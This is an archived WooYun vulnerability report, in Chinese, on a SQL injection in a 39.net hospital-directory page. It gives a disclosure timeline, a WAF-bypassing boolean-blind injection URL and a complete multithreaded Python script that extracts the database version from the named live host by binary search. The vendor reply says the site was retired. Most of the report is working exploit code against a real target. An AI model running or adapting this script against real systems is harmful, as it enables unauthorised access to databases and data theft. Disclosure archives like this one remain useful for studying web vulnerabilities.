乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-22: 细节已通知厂商并且等待厂商处理中 2015-04-23: 厂商已经确认,细节仅向厂商公开 2015-05-03: 细节向核心白帽子及相关领域专家公开 2015-05-13: 细节向普通白帽子公开 2015-05-23: 细节向实习白帽子公开 2015-06-07: 细节向公众公开
39健康网某处注入漏洞(mssql+waf+bool盲注附脚本)
http://yyk.xcp.39.net/default/area/?city=sich'%2b(case%20when%20(ascii(substring(@@version,1,1))<255)%20then%20'uan'%20else%20'xxoo'%20end)%2b'存在注入漏洞验证脚本 多线程猜解脚本
#coding=utf-8import sys,urllib2import threadingfrom multiprocessing.dummy import Poolfrom multiprocessing.dummy import Lockfrom optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibdef request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req) except HTTPError, e: if e.code == 500: return 'Runtime Error' except URLError, e: print('[!] We failed to reach a server.') print('[!] Reason: ' + str(e.reason)) sys.exit(1) return request.read()def binary_sqli(left, right, index): global result while 1: mid = (left + right)/2 if mid == left: lock.acquire() result[index-1]= chr(mid) sys.stdout.write('\r%s' % '@@version: '+''.join(result)) sys.stdout.flush() lock.release() break payload = "sich%%27%%2b(case%%20when%%20(ascii(substring(@@version,%s,1))<%s)%%20then%%20%%27uan%%27%%20else%%20%%27xxoo%%27%%20end)%%2b%%27" % (index, mid) html = request('http://yyk.xcp.39.net/default/area/?city='+payload) verify = '四川省医院'.decode('utf-8').encode('gbk') if verify in html: right = mid else: left = middef multi_run_wrapper(args): return binary_sqli(*args) if __name__ == '__main__': result=list('*'*50) lock=Lock() args = [] for i in range(1,50): args.append((32, 127, i)) pool = Pool(20) out = pool.map(multi_run_wrapper, args) pool.close() pool.join()
用脚本猜解数据如下:
过滤
危害等级:低
漏洞Rank:4
确认时间:2015-04-23 09:04
废弃站点,已关闭
暂无